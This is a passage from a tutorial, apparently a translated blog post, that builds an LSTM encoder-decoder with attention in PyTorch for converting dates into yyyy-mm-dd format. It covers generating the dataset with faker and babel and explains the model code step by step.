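    """Return (alpha, context) for one decoding step."""
    # Score each encoder state together with the previous decoder state
    # using one linear layer: e = weight . concat(s, a) + bias.
    scores = []
    for a in encoder_states:
        features = prev_decoder_state + a  # list concatenation
        scores.append(sum(w * f for w, f in zip(weight, features)) + bias)

    # Softmax over input positions turns the scores into attention weights.
    peak = max(scores)
    exps = [math.exp(e - peak) for e in scores]
    total = sum(exps)
    alpha = [v / total for v in exps]

    # The context is the attention-weighted average of the encoder states.
    dim = len(encoder_states[0])
    context = [
        sum(alpha[i] * encoder_states[i][d] for i in range(len(encoder_states)))
        for d in range(dim)
    ]
    return alpha, context


# Hypothetical numbers: three input positions, 2-d encoder and decoder states.
encoder_states = [[1.0, 0.0], [0.0, 1.0], [1.0, 1.0]]
prev_decoder_state = [0.5, -0.5]
weight = [0.1, 0.2, 1.0, -1.0]  # length = decoder dim + encoder dim
alpha, context = attention_context(encoder_states, prev_decoder_state, weight, 0.0)
print(alpha, context)
```

<p>The attention weights always sum to 1, so the context stays on the same scale as the encoder states regardless of the input length.</p>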

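<h3 id="日期翻译任务及其数据集">The date translation task and its dataset</h3>

<p>To keep the project simple, we will tackle a simple date translation task. The input is a date written in any of various formats, and the output is the same date in one standard format. For example:</p>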

<table>
  <thead>
    <tr><th>input</th><th>output</th></tr>
  </thead>
  <tbody>
    <tr><td>Nov 23, 1999</td><td>1999-11-23</td></tr>
    <tr><td>3 April 2005</td><td>2005-04-03</td></tr>
    <tr><td>14/01/1989</td><td>1989-01-14</td></tr>
    <tr><td>Thursday, February 7, 1985</td><td>1985-02-07</td></tr>
  </tbody>
</table>

<p>We can generate the dataset ourselves with <code class="language-plaintext highlighter-rouge">Python</code>. To do so, we need the <code class="language-plaintext highlighter-rouge">faker</code> library, which generates random dates, and the <code class="language-plaintext highlighter-rouge">babel</code> library, which formats dates.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pip <span class="nb">install </span>faker babel
</code></pre></div></div>
<p>Running the code below generates dates in different formats.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">random</span>

<span class="kn">from</span> <span class="nn">babel.dates</span> <span class="kn">import</span> <span class="n">format_date</span>
<span class="kn">from</span> <span class="nn">faker</span> <span class="kn">import</span> <span class="n">Faker</span>

<span class="n">faker</span> <span class="o">=</span> <span class="n">Faker</span><span class="p">()</span>
<span class="c1"># Use lowercase 'y' (calendar year); uppercase 'Y' is the ISO week-numbering year.
</span><span class="n">format_list</span> <span class="o">=</span> <span class="p">[</span>
    <span class="s">'short'</span><span class="p">,</span> <span class="s">'medium'</span><span class="p">,</span> <span class="s">'long'</span><span class="p">,</span> <span class="s">'full'</span><span class="p">,</span> <span class="s">'d MMM yyyy'</span><span class="p">,</span> <span class="s">'d MMMM yyyy'</span><span class="p">,</span> <span class="s">'dd/MM/yyyy'</span><span class="p">,</span>
    <span class="s">'dd-MM-yyyy'</span><span class="p">,</span> <span class="s">'EE d, MMM yyyy'</span><span class="p">,</span> <span class="s">'EEEE d, MMMM yyyy'</span>
<span class="p">]</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span>
    <span class="k">for</span> <span class="nb">format</span> <span class="ow">in</span> <span class="n">format_list</span><span class="p">:</span>
        <span class="n">date_obj</span> <span class="o">=</span> <span class="n">faker</span><span class="p">.</span><span class="n">date_object</span><span class="p">()</span>
        <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'</span><span class="si">{</span><span class="nb">format</span><span class="si">}</span><span class="s">:'</span><span class="p">,</span> <span class="n">date_obj</span><span class="p">,</span>
              <span class="n">format_date</span><span class="p">(</span><span class="n">date_obj</span><span class="p">,</span> <span class="nb">format</span><span class="o">=</span><span class="nb">format</span><span class="p">,</span> <span class="n">locale</span><span class="o">=</span><span class="s">'en'</span><span class="p">))</span>
</code></pre></div></div>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Possible output:
short: 1986-02-25 2/25/86
medium: 1979-08-05 Aug 5, 1979
long: 1971-12-15 December 15, 1971
full: 2017-02-14 Tuesday, February 14, 2017
d MMM yyyy: 1984-02-21 21 Feb 1984
d MMMM yyyy: 2011-06-22 22 June 2011
dd/MM/yyyy: 1991-08-02 02/08/1991
dd-MM-yyyy: 1987-06-12 12-06-1987
EE d, MMM yyyy: 1986-11-02 Sun 2, Nov 1986
EEEE d, MMMM yyyy: 1996-01-26 Friday 26, January 1996
</code></pre></div></div>
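<p><code class="language-plaintext highlighter-rouge">Faker()</code> is a proxy class for generating random data. Its <code class="language-plaintext highlighter-rouge">date_object()</code> method returns a random date object <code class="language-plaintext highlighter-rouge">date_obj</code> (a <code class="language-plaintext highlighter-rouge">datetime.date</code>, not a string). Printed as a string it reads <code class="language-plaintext highlighter-rouge">yyyy-mm-dd</code>, which is the standard format we want as output. By changing the <code class="language-plaintext highlighter-rouge">format</code> argument of the <code class="language-plaintext highlighter-rouge">format_date</code> function, we obtain the same date as differently formatted strings. The output above shows an example of each format.</p>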
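
<p>One detail worth checking when writing custom patterns for <code class="language-plaintext highlighter-rouge">format_date</code>: in the CLDR pattern syntax that Babel follows, lowercase <code class="language-plaintext highlighter-rouge">y</code> is the calendar year, while uppercase <code class="language-plaintext highlighter-rouge">Y</code> is the week-numbering year, and the two can disagree for dates close to New Year. The sketch below uses only the standard library's <code class="language-plaintext highlighter-rouge">date.isocalendar()</code> to show the effect; the sample dates are arbitrary examples.</p>

```python
from datetime import date

# Dates around New Year where the ISO week-numbering year can differ from the
# calendar year. The dates are arbitrary examples chosen for illustration.
samples = [date(2018, 12, 31), date(2021, 1, 1), date(2020, 6, 15)]

mismatches = []
for d in samples:
    iso_year = d.isocalendar()[0]  # week-numbering year
    if iso_year != d.year:
        mismatches.append((d.isoformat(), d.year, iso_year))

print(mismatches)
```

<p>If a pattern used the week-numbering year, a few samples per year would pair an input string with a target date from a different year, which would quietly add label noise to the dataset.</p>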

<p>With these utility functions, we can write the following functions for generating and loading the dataset.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">generate_date</span><span class="p">():</span>
    <span class="nb">format</span> <span class="o">=</span> <span class="n">random</span><span class="p">.</span><span class="n">choice</span><span class="p">(</span><span class="n">format_list</span><span class="p">)</span>
    <span class="n">date_obj</span> <span class="o">=</span> <span class="n">faker</span><span class="p">.</span><span class="n">date_object</span><span class="p">()</span>
    <span class="n">formated_date</span> <span class="o">=</span> <span class="n">format_date</span><span class="p">(</span><span class="n">date_obj</span><span class="p">,</span> <span class="nb">format</span><span class="o">=</span><span class="nb">format</span><span class="p">,</span> <span class="n">locale</span><span class="o">=</span><span class="s">'en'</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">formated_date</span><span class="p">,</span> <span class="n">date_obj</span>


<span class="k">def</span> <span class="nf">generate_date_data</span><span class="p">(</span><span class="n">count</span><span class="p">,</span> <span class="n">filename</span><span class="p">):</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span> <span class="s">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fp</span><span class="p">:</span>
        <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">count</span><span class="p">):</span>
            <span class="n">formated_date</span><span class="p">,</span> <span class="n">date_obj</span> <span class="o">=</span> <span class="n">generate_date</span><span class="p">()</span>
            <span class="n">fp</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="sa">f</span><span class="s">'</span><span class="si">{</span><span class="n">formated_date</span><span class="si">}</span><span class="se">\t</span><span class="si">{</span><span class="n">date_obj</span><span class="si">}</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">load_date_data</span><span class="p">(</span><span class="n">filename</span><span class="p">):</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span> <span class="s">'r'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fp</span><span class="p">:</span>
        <span class="n">lines</span> <span class="o">=</span> <span class="n">fp</span><span class="p">.</span><span class="n">readlines</span><span class="p">()</span>
        <span class="k">return</span> <span class="p">[</span><span class="n">line</span><span class="p">.</span><span class="n">strip</span><span class="p">(</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">).</span><span class="n">split</span><span class="p">(</span><span class="s">'</span><span class="se">\t</span><span class="s">'</span><span class="p">)</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">lines</span><span class="p">]</span>


<span class="n">generate_date_data</span><span class="p">(</span><span class="mi">50000</span><span class="p">,</span> <span class="s">'dldemos/attention/train.txt'</span><span class="p">)</span>
<span class="n">generate_date_data</span><span class="p">(</span><span class="mi">10000</span><span class="p">,</span> <span class="s">'dldemos/attention/test.txt'</span><span class="p">)</span>
</code></pre></div></div>
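<h3 id="注意力模型">Attention model</h3>

<p>The hardest part of this project is implementing the attention model, that is, describing the structure diagram shown earlier in PyTorch. The complete model code is as follows:</p>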
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">torch</span>
<span class="kn">import</span> <span class="nn">torch.nn</span> <span class="k">as</span> <span class="n">nn</span>
<span class="kn">from</span> <span class="nn">torch.nn.utils.rnn</span> <span class="kn">import</span> <span class="n">pad_sequence</span>
<span class="kn">from</span> <span class="nn">torch.utils.data</span> <span class="kn">import</span> <span class="n">DataLoader</span><span class="p">,</span> <span class="n">Dataset</span>

<span class="kn">from</span> <span class="nn">dldemos.attention.dataset</span> <span class="kn">import</span> <span class="n">generate_date</span><span class="p">,</span> <span class="n">load_date_data</span>


<span class="n">EMBEDDING_LENGTH</span> <span class="o">=</span> <span class="mi">128</span>
<span class="n">OUTPUT_LENGTH</span> <span class="o">=</span> <span class="mi">10</span>

<span class="k">class</span> <span class="nc">AttentionModel</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Module</span><span class="p">):</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span>
                 <span class="n">embeding_dim</span><span class="o">=</span><span class="mi">32</span><span class="p">,</span>
                 <span class="n">encoder_dim</span><span class="o">=</span><span class="mi">32</span><span class="p">,</span>
                 <span class="n">decoder_dim</span><span class="o">=</span><span class="mi">32</span><span class="p">,</span>
                 <span class="n">dropout_rate</span><span class="o">=</span><span class="mf">0.5</span><span class="p">):</span>
        <span class="nb">super</span><span class="p">().</span><span class="n">__init__</span><span class="p">()</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">drop</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Dropout</span><span class="p">(</span><span class="n">dropout_rate</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">embedding</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Embedding</span><span class="p">(</span><span class="n">EMBEDDING_LENGTH</span><span class="p">,</span> <span class="n">embeding_dim</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">attention_linear</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="mi">2</span> <span class="o">*</span> <span class="n">encoder_dim</span> <span class="o">+</span> <span class="n">decoder_dim</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">softmax</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Softmax</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">encoder</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">LSTM</span><span class="p">(</span><span class="n">embeding_dim</span><span class="p">,</span>
                               <span class="n">encoder_dim</span><span class="p">,</span>
                               <span class="mi">1</span><span class="p">,</span>
                               <span class="n">batch_first</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span>
                               <span class="n">bidirectional</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">decoder</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">LSTM</span><span class="p">(</span><span class="n">EMBEDDING_LENGTH</span> <span class="o">+</span> <span class="mi">2</span> <span class="o">*</span> <span class="n">encoder_dim</span><span class="p">,</span>
                               <span class="n">decoder_dim</span><span class="p">,</span>
                               <span class="mi">1</span><span class="p">,</span>
                               <span class="n">batch_first</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">output_linear</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="n">decoder_dim</span><span class="p">,</span> <span class="n">EMBEDDING_LENGTH</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">decoder_dim</span> <span class="o">=</span> <span class="n">decoder_dim</span>

    <span class="k">def</span> <span class="nf">forward</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x</span><span class="p">:</span> <span class="n">torch</span><span class="p">.</span><span class="n">Tensor</span><span class="p">,</span> <span class="n">n_output</span><span class="p">:</span> <span class="nb">int</span> <span class="o">=</span> <span class="n">OUTPUT_LENGTH</span><span class="p">):</span>
        <span class="c1"># x: [batch, n_sequence], integer indices in [0, EMBEDDING_LENGTH)
</span>        <span class="n">batch</span><span class="p">,</span> <span class="n">n_squence</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">shape</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">2</span><span class="p">]</span>

        <span class="c1"># x: [batch, n_sequence, embeding_dim]
</span>        <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">drop</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">embedding</span><span class="p">(</span><span class="n">x</span><span class="p">))</span>

        <span class="c1"># a: [batch, n_sequence, 2 * encoder_dim] (bidirectional encoder)
</span>        <span class="n">a</span><span class="p">,</span> <span class="n">_</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">encoder</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>

        <span class="c1"># prev_s: [batch, n_squence=1, hidden]
</span>        <span class="c1"># prev_y: [batch, n_squence=1, EMBEDDING_LENGTH]
</span>        <span class="c1"># y: [batch, n_output, EMBEDDING_LENGTH]
</span>        <span class="n">prev_s</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">new_zeros</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">decoder_dim</span><span class="p">)</span>
        <span class="n">prev_y</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">new_zeros</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">EMBEDDING_LENGTH</span><span class="p">)</span>
        <span class="n">y</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">new_empty</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="n">n_output</span><span class="p">,</span> <span class="n">EMBEDDING_LENGTH</span><span class="p">)</span>
        <span class="n">tmp_states</span> <span class="o">=</span> <span class="bp">None</span>
        <span class="k">for</span> <span class="n">i_output</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">n_output</span><span class="p">):</span>
            <span class="c1"># repeat_s: [batch, n_squence, hidden]
</span>            <span class="n">repeat_s</span> <span class="o">=</span> <span class="n">prev_s</span><span class="p">.</span><span class="n">repeat</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">n_squence</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
            <span class="c1"># attention_input: [batch * n_sequence, hidden_s + hidden_a]
</span>            <span class="n">attention_input</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">cat</span><span class="p">((</span><span class="n">repeat_s</span><span class="p">,</span> <span class="n">a</span><span class="p">),</span>
                                        <span class="mi">2</span><span class="p">).</span><span class="n">reshape</span><span class="p">(</span><span class="n">batch</span> <span class="o">*</span> <span class="n">n_squence</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
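            <span class="c1"># scores: [batch * n_sequence, 1] -&gt; [batch, n_sequence], so softmax normalizes over input positions
</span>            <span class="n">alpha</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">softmax</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">attention_linear</span><span class="p">(</span><span class="n">attention_input</span><span class="p">).</span><span class="n">reshape</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="n">n_squence</span><span class="p">))</span>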
            <span class="n">c</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="nb">sum</span><span class="p">(</span><span class="n">a</span> <span class="o">*</span> <span class="n">alpha</span><span class="p">.</span><span class="n">reshape</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="n">n_squence</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="mi">1</span><span class="p">)</span>
            <span class="n">c</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">unsqueeze</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
            <span class="n">decoder_input</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">cat</span><span class="p">((</span><span class="n">prev_y</span><span class="p">,</span> <span class="n">c</span><span class="p">),</span> <span class="mi">2</span><span class="p">)</span>

            <span class="k">if</span> <span class="n">tmp_states</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
                <span class="n">prev_s</span><span class="p">,</span> <span class="n">tmp_states</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">decoder</span><span class="p">(</span><span class="n">decoder_input</span><span class="p">)</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="n">prev_s</span><span class="p">,</span> <span class="n">tmp_states</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">decoder</span><span class="p">(</span><span class="n">decoder_input</span><span class="p">,</span> <span class="n">tmp_states</span><span class="p">)</span>

            <span class="n">prev_y</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">output_linear</span><span class="p">(</span><span class="n">prev_s</span><span class="p">)</span>
            <span class="n">y</span><span class="p">[:,</span> <span class="n">i_output</span><span class="p">]</span> <span class="o">=</span> <span class="n">prev_y</span><span class="p">.</span><span class="n">squeeze</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">y</span>
</code></pre></div></div>
<p>Let's walk through this implementation piece by piece.</p>

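<p>Before implementing the model, we need a few constants. First we decide the size of the "vocabulary". In the date translation task, both the input and the output are treated as character sequences. There are at most 128 ASCII characters, so we set the vocabulary size to 128.</p>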

<p><code class="language-plaintext highlighter-rouge">EMBEDDING_LENGTH = 128</code></p>

<p>In this task the output sequence has a fixed length. The date string yyyy-mm-dd is 10 characters long, so we define that constant as well.</p>

<p><code class="language-plaintext highlighter-rouge">OUTPUT_LENGTH = 10</code></p>
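<p>As a minimal sketch of what these two constants mean, the snippet below maps a target date string to character ids and checks it against both constants. The helper <code class="language-plaintext highlighter-rouge">char_ids</code> is a hypothetical name introduced here for illustration; it is not part of the original project.</p>

```python
EMBEDDING_LENGTH = 128  # vocabulary size: one slot per ASCII code point
OUTPUT_LENGTH = 10      # len("yyyy-mm-dd")


def char_ids(text):
    """Map each character to its ASCII code; reject anything outside the vocabulary."""
    ids = [ord(ch) for ch in text]
    if any(i >= EMBEDDING_LENGTH for i in ids):
        raise ValueError(f"character outside the 128-entry vocabulary in {text!r}")
    return ids


target_ids = char_ids("1988-11-04")
print(target_ids)                        # [49, 57, 56, 56, 45, 49, 49, 45, 48, 52]
print(len(target_ids) == OUTPUT_LENGTH)  # True
```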

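<p>Next comes the model itself. Start with the structure defined in __init__. Following the usual convention for RNN models, the input first passes through an embedding layer and Dropout. For word sequences, pretrained word embeddings usually work better. This project uses character sequences, however, so a learnable embedding layer is enough.</p>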
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="bp">self</span><span class="p">.</span><span class="n">drop</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Dropout</span><span class="p">(</span><span class="n">dropout_rate</span><span class="p">)</span>
<span class="bp">self</span><span class="p">.</span><span class="n">embedding</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Embedding</span><span class="p">(</span><span class="n">EMBEDDING_LENGTH</span><span class="p">,</span> <span class="n">embeding_dim</span><span class="p">)</span>
</code></pre></div></div>
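<p>Next are the encoder and the decoder. In an attention model they are two separate RNNs. To make full use of the input, the encoder can be a bidirectional RNN. Machine translation is a generation task in which each step depends on the element generated in the previous step, so the decoder must be a unidirectional RNN. In this project the RNN I use is an LSTM. The modules are defined as follows:</p>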
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="bp">self</span><span class="p">.</span><span class="n">encoder</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">LSTM</span><span class="p">(</span><span class="n">embeding_dim</span><span class="p">,</span>
                        <span class="n">encoder_dim</span><span class="p">,</span>
                        <span class="mi">1</span><span class="p">,</span>
                        <span class="n">batch_first</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span>
                        <span class="n">bidirectional</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
<span class="bp">self</span><span class="p">.</span><span class="n">decoder</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">LSTM</span><span class="p">(</span><span class="n">EMBEDDING_LENGTH</span> <span class="o">+</span> <span class="mi">2</span> <span class="o">*</span> <span class="n">encoder_dim</span><span class="p">,</span>
                        <span class="n">decoder_dim</span><span class="p">,</span>
                        <span class="mi">1</span><span class="p">,</span>
                        <span class="n">batch_first</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>     
</code></pre></div></div>
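<p>Pay attention to the input sizes of these two modules. The encoder's input comes from the embedding layer, so its size is embeding_dim, which is straightforward. The decoder's input size takes a little calculation. The decoder's input is the concatenation of the model's previous output and the attention output. The model outputs one character per step, and a character's size is the vocabulary size, <code class="language-plaintext highlighter-rouge">EMBEDDING_LENGTH</code>. The attention output is a weighted sum of the encoder's hidden states, so it has the same size as those hidden states. The encoder is a bidirectional RNN, so its hidden states have size <code class="language-plaintext highlighter-rouge">2 * encoder_dim</code>. The decoder's input size is therefore <code class="language-plaintext highlighter-rouge">EMBEDDING_LENGTH + 2 * encoder_dim</code>.</p>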

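<p>In the attention module, the decoder's attention over the encoder states is computed by a linear layer. Its input is the concatenation of the decoder's and the encoder's hidden states, so its input size is <code class="language-plaintext highlighter-rouge">2 * encoder_dim + decoder_dim</code>. Its output is the attention score, a single real number, which the softmax later turns into a normalized weight.</p>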
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="bp">self</span><span class="p">.</span><span class="n">attention_linear</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="mi">2</span> <span class="o">*</span> <span class="n">encoder_dim</span> <span class="o">+</span> <span class="n">decoder_dim</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
</code></pre></div></div>
<p>After decoding, a final linear layer maps the decoder state to the output.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="bp">self</span><span class="p">.</span><span class="n">output_linear</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="n">decoder_dim</span><span class="p">,</span> <span class="n">EMBEDDING_LENGTH</span><span class="p">)</span>
</code></pre></div></div>
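<p>The size bookkeeping above can be checked with plain arithmetic. The sketch below is only an illustration: the function name is hypothetical, and <code class="language-plaintext highlighter-rouge">encoder_dim=32</code> and <code class="language-plaintext highlighter-rouge">decoder_dim=32</code> are assumed values, since the model's actual defaults are not shown in this part of the article.</p>

```python
def attention_model_sizes(embedding_length, encoder_dim, decoder_dim):
    """Return the input/output sizes implied by the module definitions."""
    encoder_out = 2 * encoder_dim  # bidirectional LSTM: forward + backward states
    return {
        "decoder_lstm_input": embedding_length + encoder_out,  # prev_y ++ context c
        "attention_linear_input": encoder_out + decoder_dim,   # prev_s ++ a
        "attention_linear_output": 1,                          # one score per position
        "output_linear_output": embedding_length,              # one score per character
    }


# encoder_dim=32 and decoder_dim=32 are illustrative values only.
sizes = attention_model_sizes(embedding_length=128, encoder_dim=32, decoder_dim=32)
print(sizes["decoder_lstm_input"])      # 192
print(sizes["attention_linear_input"])  # 96
```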

<p>With __init__ covered, let's see how forward connects the modules.</p>

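<p>Machine translation is really a sequence generation task. In general the length of the generated sequence is not known in advance, and extra techniques are needed to select the best output sequence. To keep the implementation simple, this project generates an output sequence of fixed length, which is passed as an argument to forward. The signature of forward is therefore:</p>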
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">forward</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x</span><span class="p">:</span> <span class="n">torch</span><span class="p">.</span><span class="n">Tensor</span><span class="p">,</span> <span class="n">n_output</span><span class="p">:</span> <span class="nb">int</span> <span class="o">=</span> <span class="n">OUTPUT_LENGTH</span><span class="p">):</span>
</code></pre></div></div>
<p>First, read off some shape information.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># x: [batch, n_sequence], integer character ids
</span><span class="n">batch</span><span class="p">,</span> <span class="n">n_squence</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">shape</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">2</span><span class="p">]</span>
</code></pre></div></div>
<p>The input passes through the embedding layer and the dropout layer.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># x: [batch, n_sequence, embeding_dim]
</span><span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">drop</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">embedding</span><span class="p">(</span><span class="n">x</span><span class="p">))</span>
</code></pre></div></div>
<p>It then passes through the encoder, which yields the encoder hidden states a.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># a: [batch, n_sequence, hidden]
</span><span class="n">a</span><span class="p">,</span> <span class="n">_</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">encoder</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
</code></pre></div></div>
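<p>Next, a for loop produces the output of each step. Before that, we prepare a few intermediate variables: prev_s, the decoder's previous state used for computing attention; prev_y, the previous output fed into the decoder; and the output tensor y. Because we call the decoder manually for every step inside the loop, we also need to keep the decoder's internal states in tmp_states.</p>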
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># prev_s: [batch, n_squence=1, hidden]
# prev_y: [batch, n_squence=1, EMBEDDING_LENGTH]
# y: [batch, n_output, EMBEDDING_LENGTH]
</span><span class="n">prev_s</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">new_zeros</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">decoder_dim</span><span class="p">)</span>
<span class="n">prev_y</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">new_zeros</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">EMBEDDING_LENGTH</span><span class="p">)</span>
<span class="n">y</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">new_empty</span><span class="p">(</span><span class="n">batch</span><span class="p">,</span> <span class="n">n_output</span><span class="p">,</span> <span class="n">EMBEDDING_LENGTH</span><span class="p">)</span>
<span class="n">tmp_states</span> <span class="o">=</span> <span class="bp">None</span>
</code></pre></div></div>
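<p>In each step, we first compute the decoder's attention alpha over every input position. Each alpha is determined by the decoder's previous state prev_s and the encoder state at that position (a fully connected layer followed by softmax). To exploit parallel computation, all the alpha computations can be packed into one batch and done in a single step.</p>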

<p><img src="pytorch_images/5.jpg" alt="image" /></p>

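<p><em>Note that the fully connected layer plus softmax here differs from an ordinary fully connected network. The layer has a single output channel; it is applied to each of the n inputs to give n results, and softmax is then taken over those n results. We get all n results in one call by folding n into the batch dimension.</em></p>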
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="n">i_output</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">n_output</span><span class="p">):</span>
    <span class="c1"># repeat_s: [batch, n_squence, hidden]
</span>    <span class="n">repeat_s</span> <span class="o">=</span> <span class="n">prev_s</span><span class="p">.</span><span class="n">repeat</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">n_squence</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
    <span class="c1"># attention_input: [batch * n_sequence, hidden_s + hidden_a]
</span>    <span class="n">attention_input</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">cat</span><span class="p">((</span><span class="n">repeat_s</span><span class="p">,</span> <span class="n">a</span><span class="p">),</span>
